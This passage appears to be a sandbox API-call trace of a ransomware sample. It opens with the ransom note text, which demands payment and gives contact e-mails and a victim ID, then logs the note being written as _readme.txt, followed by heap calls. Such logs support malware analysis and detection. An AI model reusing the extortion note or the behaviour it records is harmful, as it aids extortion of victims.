strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.747] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.748] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.748] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.748] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.748] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.748] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.748] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.755] RtlAllocateHeap 